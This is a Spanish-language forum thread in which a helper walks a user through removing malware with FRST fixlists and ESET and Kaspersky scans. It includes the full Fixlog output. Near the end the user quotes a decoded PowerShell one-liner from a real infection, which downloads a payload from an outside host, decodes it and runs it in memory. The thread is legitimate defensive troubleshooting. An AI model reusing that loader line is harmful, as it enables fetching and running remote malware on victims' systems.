2019-04-19 17:00 - 2017-05-23 13:59 - 000494080 _____ (Skillbrains) [File not signed] C:\Program Files (x86)\Skillbrains\lightshot\5.4.0.35\Lightshot.dll
2019-04-19 17:00 - 2017-05-23 13:59 - 000256000 _____ (Skillbrains) [File not signed] C:\Program Files (x86)\Skillbrains\lightshot\5.4.0.35\uploader.dll
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [442]


CMD: ipconfig /flushdns
CMD: ipconfig /renew
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
RemoveProxy:
EmptyTemp:
Hosts:
END
  • Lo guardas bajo el nombre de fixlist.txt en el escritorio <<< Esto es muy importante.

Nota: Es necesario que el ejecutable Frst.exe y fixlist.txt se encuentren en la misma ubicación (escritorio) o si no la herramienta no trabajara.

  • Ejecutas Frst.exe.
  • Presionas el botón Fix y aguardas a que termine.
  • La Herramienta guardara el reporte en tu escritorio (Fixlog.txt).
  • Lo pegas en tu próxima respuesta.

Nos comentas .

Salu2.

1 me gusta
9

Hola de nuevo, muchas gracias por la información. Paso 1: Listo.

https://www.virustotal.com/gui/file/f7d507af865edf961a16f7736f05dd06657e19134391d2c1c762c0ca7ab353ab/behavior/VirusTotal%20Jujubox

Paso 2: Listo

Paso 3: Si está en el escritorio, originalmente la instalación fue en ingles, pero en una actualización el sistema se cambió a español por eso quedo la ruta así, pero si están en el escritorio.

Paso 4: Listo

Resultados de la corrección de Farbar Recovery Scan Tool (x64) Versión: 25-12-2019
Ejecutado por saenz (25-12-2019 23:04:44) Run:1
Ejecutado desde C:\Users\saenz\Desktop
Perfiles cargados: saenz (Perfiles disponibles: saenz)
Modo de Inicio: Normal
==============================================

fixlist contenido:
*****************
Start
CloseProcesses:
CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
GroupPolicy: Restriction ? <==== ATTENTION
Task: {292105C6-EC0D-4A19-932D-8D8604EF176C} - System32\Tasks\update-S-1-5-21-3305917012-4270169547-4029195171-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: <Company name>)
Task: {FC10929C-B757-4C0F-A4FE-4443A9CE04E6} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [414872 2017-04-12] (OOO Lightshot -> TODO: <Company name>)
Task: C:\WINDOWS\Tasks\update-S-1-5-21-3305917012-4270169547-4029195171-1001.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
Task: C:\WINDOWS\Tasks\update-sys.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
C:\Program Files (x86)\Skillbrains
Tcpip\..\Interfaces\{2eeec63d-7fe8-4fbd-a8e2-26851ad9ee3f}: [DhcpNameServer] 172.20.10.1
Tcpip\..\Interfaces\{baefaf9a-b4f0-4337-a344-32635598252e}: [DhcpNameServer] 10.10.8.1
SearchScopes: HKU\S-1-5-21-3305917012-4270169547-4029195171-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE00
SearchScopes: HKU\S-1-5-21-3305917012-4270169547-4029195171-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE00
SearchScopes: HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE00
SearchScopes: HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE00
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\ssv.dll [2019-08-02] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\jp2ssv.dll [2019-08-02] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\dtplugin\npDeployJava1.dll [2019-08-02] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\plugin2\npjp2.dll [2019-08-02] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @videolan.org/vlc,version=3.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\bd_js_config.js [2019-11-30] <==== ATTENTION (Points to *.cfg file)
FF ExtraCheck: C:\Program Files\mozilla firefox\bd_config.cfg [2019-11-30] <==== ATTENTION
S3 WinRing0_1_2_0; \??\C:\Users\saenz\AppData\Local\Temp\tmp53A7.tmp [X] <==== ATTENTION
C:\Users\saenz\AppData\Local\Temp\tmp53A7.tmp
2019-04-19 17:00 - 2017-05-23 13:59 - 000494080 _____ (Skillbrains) [File not signed] C:\Program Files (x86)\Skillbrains\lightshot\5.4.0.35\Lightshot.dll
2019-04-19 17:00 - 2017-05-23 13:59 - 000256000 _____ (Skillbrains) [File not signed] C:\Program Files (x86)\Skillbrains\lightshot\5.4.0.35\uploader.dll
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [442]


CMD: ipconfig /flushdns
CMD: ipconfig /renew
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
RemoveProxy:
EmptyTemp:
Hosts:
END
*****************

Procesos cerrados correctamente.
El punto de restauración fue creado correctamente.
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\" => eliminado correctamente
C:\WINDOWS\system32\GroupPolicy\Machine => movido correctamente
C:\WINDOWS\system32\GroupPolicy\GPT.ini => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{292105C6-EC0D-4A19-932D-8D8604EF176C}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{292105C6-EC0D-4A19-932D-8D8604EF176C}" => eliminado correctamente
C:\WINDOWS\System32\Tasks\update-S-1-5-21-3305917012-4270169547-4029195171-1001 => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\update-S-1-5-21-3305917012-4270169547-4029195171-1001" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FC10929C-B757-4C0F-A4FE-4443A9CE04E6}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FC10929C-B757-4C0F-A4FE-4443A9CE04E6}" => eliminado correctamente
C:\WINDOWS\System32\Tasks\update-sys => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\update-sys" => eliminado correctamente
C:\WINDOWS\Tasks\update-S-1-5-21-3305917012-4270169547-4029195171-1001.job => movido correctamente
C:\WINDOWS\Tasks\update-sys.job => movido correctamente
"C:\Program Files (x86)\Skillbrains" => no encontrado
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{2eeec63d-7fe8-4fbd-a8e2-26851ad9ee3f}\\DhcpNameServer" => eliminado correctamente
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{baefaf9a-b4f0-4337-a344-32635598252e}\\DhcpNameServer" => eliminado correctamente
"HKU\S-1-5-21-3305917012-4270169547-4029195171-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => eliminado correctamente
HKU\S-1-5-21-3305917012-4270169547-4029195171-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => eliminado correctamente
SearchScopes: HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE00 => Error ({ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}): Ninguna corrección automática encontrada para esta entrada.
SearchScopes: HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02&pc=UE00 => Error ({ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}): Ninguna corrección automática encontrada para esta entrada.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} => eliminado correctamente
HKLM\Software\Wow6432Node\Classes\CLSID\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} => eliminado correctamente
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9} => eliminado correctamente
HKLM\Software\Wow6432Node\Classes\CLSID\{DBC80044-A445-435b-BC74-9C25C1C588A9} => eliminado correctamente
"HKLM\Software\Wow6432Node\MozillaPlugins\@java.com/DTPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\dtplugin\npDeployJava1.dll [2019-08-02] (Oracle America, Inc." => no encontrado
C:\Program Files (x86)\Java\jre1.8.0_221\bin\dtplugin\npDeployJava1.dll => movido correctamente
"HKLM\Software\Wow6432Node\MozillaPlugins\@java.com/JavaPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\plugin2\npjp2.dll [2019-08-02] (Oracle America, Inc." => no encontrado
C:\Program Files (x86)\Java\jre1.8.0_221\bin\plugin2\npjp2.dll => movido correctamente
"HKLM\Software\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN" => no encontrado
C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll => movido correctamente
"HKLM\Software\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.7.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN" => no encontrado
"C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll" => no encontrado
C:\Program Files\mozilla firefox\defaults\pref\bd_js_config.js => movido correctamente
C:\Program Files\mozilla firefox\bd_config.cfg => movido correctamente
HKLM\System\CurrentControlSet\Services\WinRing0_1_2_0 => eliminado correctamente
WinRing0_1_2_0 => servicio eliminado correctamente
"C:\Users\saenz\AppData\Local\Temp\tmp53A7.tmp" => no encontrado
"C:\Program Files (x86)\Skillbrains\lightshot\5.4.0.35\Lightshot.dll" => no encontrado
"C:\Program Files (x86)\Skillbrains\lightshot\5.4.0.35\uploader.dll" => no encontrado
C:\Users\Public\Shared Files => ":VersionCache" ADS eliminado correctamente

========= ipconfig /flushdns =========


Configuraci¢n IP de Windows

Se vaci¢ correctamente la cach‚ de resoluci¢n de DNS.

========= Final de CMD: =========


========= ipconfig /renew =========


Configuraci¢n IP de Windows

No se puede realizar ninguna operaci¢n en Ethernet 3 mientras los medios
est‚n desconectados.

Adaptador de Ethernet Ethernet:

   Sufijo DNS espec¡fico para la conexi¢n. . : rga.ip
   Direcci¢n IPv6 . . . . . . . . . . : 2806:108e:14:48ea:a011:e477:94df:e690
   Direcci¢n IPv6 temporal. . . . . . : 2806:108e:14:48ea:4927:e5a7:a26f:e178
   V¡nculo: direcci¢n IPv6 local. . . : fe80::a011:e477:94df:e690%8
   Direcci¢n IPv4. . . . . . . . . . . . . . : 192.168.1.68
   M scara de subred . . . . . . . . . . . . : 255.255.255.0
   Puerta de enlace predeterminada . . . . . : fe80::1%8
                                       192.168.1.254

Adaptador de Ethernet Ethernet 3:

   Estado de los medios. . . . . . . . . . . : medios desconectados
   Sufijo DNS espec¡fico para la conexi¢n. . : 

========= Final de CMD: =========


========= bitsadmin /reset /allusers =========


BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.

Unable to cancel {22B3886F-40E9-472F-A265-8A63416CC500}.
0 out of 1 jobs canceled.

========= Final de CMD: =========


========= netsh winsock reset =========


El cat logo Winsock se restableci¢ correctamente.
Debe reiniciar el equipo para completar el restablecimiento.


========= Final de CMD: =========


========= netsh advfirewall reset =========

Aceptar


========= Final de CMD: =========


========= netsh advfirewall set allprofiles state ON =========

Aceptar


========= Final de CMD: =========


========= netsh int ipv4 reset =========

Reenv¡o de compartimiento se restableci¢ correctamente.
Compartimiento se restableci¢ correctamente.
Protocolo de control se restableci¢ correctamente.
Solicitud de secuencia eco se restableci¢ correctamente.
Global se restableci¢ correctamente.
Interfaz se restableci¢ correctamente.
Direcci¢n de difusi¢n por proximidad (a se restableci¢ correctamente.
Direcciones de multidifusi¢n se restableci¢ correctamente.
Direcci¢n de unidifusi¢n se restableci¢ correctamente.
Vecino se restableci¢ correctamente.
Ruta de acceso se restableci¢ correctamente.
Posible se restableci¢ correctamente.
Directiva de prefijo se restableci¢ correctamente.
Vecino de proxy se restableci¢ correctamente.
Ruta se restableci¢ correctamente.
Prefijo de sitio se restableci¢ correctamente.
Subinterfaz se restableci¢ correctamente.
Patr¢n de reactivaci¢n se restableci¢ correctamente.
Resolver vecino se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
Error al restablecer .
Acceso denegado.

 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
Reinicie el equipo para completar esta acci¢n.


========= Final de CMD: =========


========= netsh int ipv6 reset =========

Reenv¡o de compartimiento se restableci¢ correctamente.
Compartimiento se restableci¢ correctamente.
Protocolo de control se restableci¢ correctamente.
Solicitud de secuencia eco se restableci¢ correctamente.
Global se restableci¢ correctamente.
Interfaz se restableci¢ correctamente.
Direcci¢n de difusi¢n por proximidad (a se restableci¢ correctamente.
Direcciones de multidifusi¢n se restableci¢ correctamente.
Direcci¢n de unidifusi¢n se restableci¢ correctamente.
Vecino se restableci¢ correctamente.
Ruta de acceso se restableci¢ correctamente.
Posible se restableci¢ correctamente.
Directiva de prefijo se restableci¢ correctamente.
Vecino de proxy se restableci¢ correctamente.
Ruta se restableci¢ correctamente.
Prefijo de sitio se restableci¢ correctamente.
Subinterfaz se restableci¢ correctamente.
Patr¢n de reactivaci¢n se restableci¢ correctamente.
Resolver vecino se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
Error al restablecer .
Acceso denegado.

 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
 se restableci¢ correctamente.
Reinicie el equipo para completar esta acci¢n.


========= Final de CMD: =========


========= RemoveProxy: =========

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => eliminado correctamente
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => eliminado correctamente
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => eliminado correctamente
"HKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => eliminado correctamente
"HKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => eliminado correctamente
"HKU\S-1-5-21-3305917012-4270169547-4029195171-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => eliminado correctamente
"HKU\S-1-5-21-3305917012-4270169547-4029195171-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => eliminado correctamente


========= Final de RemoveProxy: =========

C:\Windows\System32\Drivers\etc\hosts => movido correctamente
Hosts restaurado correctamente.

=========== EmptyTemp: ==========

BITS transfer queue => 10248192 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 169600652 B
Java, Flash, Steam htmlcache => 256454034 B
Windows/system/drivers => 4800622 B
Edge => 1900848 B
Chrome => 615699078 B
Firefox => 17873444 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 11191 B
LocalService => 92205 B
NetworkService => 203179 B
saenz => 345439889 B

RecycleBin => 88423545 B
EmptyTemp: => 1.4 GB datos temporales Eliminados.

================================


El sistema necesita reiniciarse.

==== Final de Fixlog 23:05:35 ====

Nota extraña, se actualizó el FRST y se puso en español.

Pregunta: La aplicación lightshot fue infectada por el virus? la tengo hace años y nunca me dio alguna detección con antivirus.

https://www.virustotal.com/gui/file/4f35c954c0c2ce628c7ea84e3bd44cfd7e770ecff8a434fae1e65102336dbcf2/detection

Agradezco mucho de nuevo toda la ayuda, espero que se pueda limpiar el sistema.

Feliz Navidad, y de nuevo gracias, sigo en contacto.

1 me gusta
10

Actualización, la infección persiste, inclusive borre manualmente las entradas al registro que genera en \HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap que no incluia el fixlist, y al reiniciar el pc reaparecen y el virus vuelve a acceder a powershell.

11

Hola @BigElros

:+1:

Es normal sacaron justamente una actualización con traducción.

Una vez que terminemos podrás volver a reinstalarla.

Felices Fiestas, para ti y los tuyos…:+1:

1.- Realiza lo siguiente:

Análisis del PC con Eset Online Scaner : Manual de Uso lee las instrucciones para salvar el reporte.

Análisis del PC con Kasperky Virus Removal Tool: Manual de Uso

  • Este no da reporte cuando te encuentres, si es que lo hace con alguna infección, tomas una imagen y la subes.

Como subir imágenes al Foro ?

Salu2

1 me gusta
12

Buenas noches, aqui el progreso de hoy. Paso 1 Eset Scaner: 26/12/2019 22:41:48 p. m. Archivos explorados: 540108 Archivos infectados: 2 Amenazas eliminadas: 2 Tiempo total de exploración 01:01:26 Estado de la exploración: Finalizado

C:\Users\saenz\AppData\Google.js	JS/TrojanDownloader.Agent.TWS troyano	desinfectado por eliminación
C:\Windows\files\bin\x64WDV\FakeClient.exe	Win64/HackKMS.L aplicación potencialmente no segura	desinfectado por eliminación

Paso 2: Kaspersky

Captura
Captura790×613 68.1 KB

Las del paso uno creoq ue ya habian sido eliminadas pero volvian a aparecer, con el proceso de kaspersky al reiniciar ya no aparecieron. Estoy esperando a que escanee de nuevo, y subo resultados.

Captura2
Captura21159×639 58.3 KB
No puedo dejar de agradecer, buena noche. Edit. parece que ya no aparece de vuelta, deberia realizar una nueva serie de escaneos en el orden que usted me pidió?

13

Hola @BigElros

Buen Trabajo…:clap::clap:

Por el momento prueba el equipo unas 24 a 48 hs, realiza varios reinicios, y ve como funciona el equipo.

Vuelves y nos comentas.

Salu2

14

Al parecer el registro sigue siendo editado, mas no encuentro que lo edita. También acabo de descubrir que el powershell.exe era ejecutado con argumentos, por ahora parece que ya no, lo seguiré monitoreando en el visor de eventos.

visor eventos
visor eventos1362×939 49.5 KB
Google me dijo que podría ser base64 y así es, este es el resultado

sleep 8; [AppDomain]::CurrentDomain.Load([Convert]::Frombase64String((New-Object 'Net.WebClient').'DownloadString'('http://manedina.top/bit/I.mp3').replace('^*!~','A'))).EntryPoint.invoke($null,$null);sleep 8888

Resulta que ahí esta el por qué se accedía tanto a ese sitio.

15

Hola @BigElros

Muy interesante lo que comentas de los argumentos que utiliza el script:

Esta familia consta de scripts de VBScript maliciosos que se utilizan para descargar módulos de malware adicionales mediante PowerShell. Estas secuencias de comandos contienen secuencias de comandos cifradas de PowerShell que posteriormente se descifran y pasan a PowerShell como argumentos.

Prueba lo siguiente:

1.- Desactiva temporalmente tu antivirus y cualquier programa de seguridad.

2.- Descarga a tu escritorio:

3.- Luego lo instalas y actualizas.

Realiza un Análisis Completo de acuerdo a su Manual.

4.- Luego de eliminar lo detectado, si te encuentra algo, reinicias y vuelves a ejecutar el Online de Kaspersky.

Tomas imagen del resultado.

5.- Vuelves a ejecutar FRST tal como te lo solicite la primera vez, y nos traes sus reportes frescos.

Salu2